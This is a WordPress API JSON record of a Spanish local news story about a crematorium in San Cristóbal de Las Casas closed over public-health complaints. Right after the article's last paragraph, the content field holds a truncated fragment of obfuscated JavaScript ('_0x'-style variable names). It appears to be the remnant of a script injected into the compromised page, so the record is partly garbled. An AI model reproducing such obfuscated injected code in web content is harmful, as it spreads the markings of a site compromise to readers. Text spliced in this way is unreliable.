{"id":20329,"date":"2025-02-13T03:40:59","date_gmt":"2025-02-13T03:40:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20329"},"modified":"2025-02-13T03:41:00","modified_gmt":"2025-02-13T03:41:00","slug":"clausuran-crematorio-en-sclc-por-problemas-de-salud-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20329","title":{"rendered":"Clausuran crematorio en SCLC por problemas de salud p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/3651af86-4705-48bc-8dad-c3a8dfef0595-1024x576.jpeg\" alt=\"\" class=\"wp-image-20330\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/3651af86-4705-48bc-8dad-c3a8dfef0595-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/3651af86-4705-48bc-8dad-c3a8dfef0595-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/3651af86-4705-48bc-8dad-c3a8dfef0595-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/3651af86-4705-48bc-8dad-c3a8dfef0595-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/3651af86-4705-48bc-8dad-c3a8dfef0595.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edgue\/ corresponsal<\/p>\n\n\n\n<p>12 de febrero del 2025. San Crist\u00f3bal de Las Casas.- El crematorio ubicado dentro del pante\u00f3n municipal de esta ciudad fue clausurado debido a problemas de salud p\u00fablica, inform\u00f3 el ayuntamiento de San Crist\u00f3bal.<\/p>\n\n\n\n<p>Explico que la instalaci\u00f3n gener\u00f3 inconformidad entre los habitantes del barrio de F\u00e1tima, quienes denunciaron malos olores y posibles riesgos sanitarios. A pesar de las constantes quejas y solicitudes presentadas durante la administraci\u00f3n anterior, encabezada por Mariano D\u00edaz Ochoa, el crematorio continu\u00f3 operando durante aproximadamente dos a\u00f1os antes de su reciente cierre.<\/p>\n\n\n\n<p>El servicio fue implementado con la intenci\u00f3n de evitar que las familias tuvieran que trasladarse a Tuxtla Guti\u00e9rrez para realizar cremaciones, lo que representaba un ahorro econ\u00f3mico. Sin embargo, la falta de condiciones higi\u00e9nicas adecuadas motiv\u00f3 su clausura.<\/p>\n\n\n\n<p>\u201cPor problemas de salud p\u00fablica se tom\u00f3 la decisi\u00f3n de cerrar el crematorio. No sabemos cu\u00e1ndo podr\u00eda reabrirse, ya que el pante\u00f3n municipal tambi\u00e9n enfrenta una situaci\u00f3n cr\u00edtica: est\u00e1 saturado. Estamos en la b\u00fasqueda de un nuevo terreno para habilitar otro pante\u00f3n, pues durante la pandemia de COVID-19 hubo un manejo inadecuado de los espacios, lo que ha generado denuncias ciudadanas\u201d, explic\u00f3.<\/p>\n\n\n\n<p>Por el momento, las personas que requieran el servicio de cremaci\u00f3n deber\u00e1n trasladarse nuevamente a Tuxtla Guti\u00e9rrez. Por lo que se\u00f1al\u00f3 que la posible reapertura del crematorio depender\u00e1 del cumplimiento de los requisitos sanitarios y de la evaluaci\u00f3n de expertos en salud.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edgue\/ corresponsal 12 de febrero del 2025. San Crist\u00f3bal de Las Casas.- El crematorio ubicado dentro del pante\u00f3n municipal de esta ciudad fue clausurado debido a problemas de salud p\u00fablica, inform\u00f3 el ayuntamiento de San Crist\u00f3bal. Explico que la instalaci\u00f3n gener\u00f3 inconformidad entre los habitantes del barrio de F\u00e1tima, quienes denunciaron malos olores y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20330,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20329","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20329"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20329\/revisions"}],"predecessor-version":[{"id":20331,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20329\/revisions\/20331"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20330"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}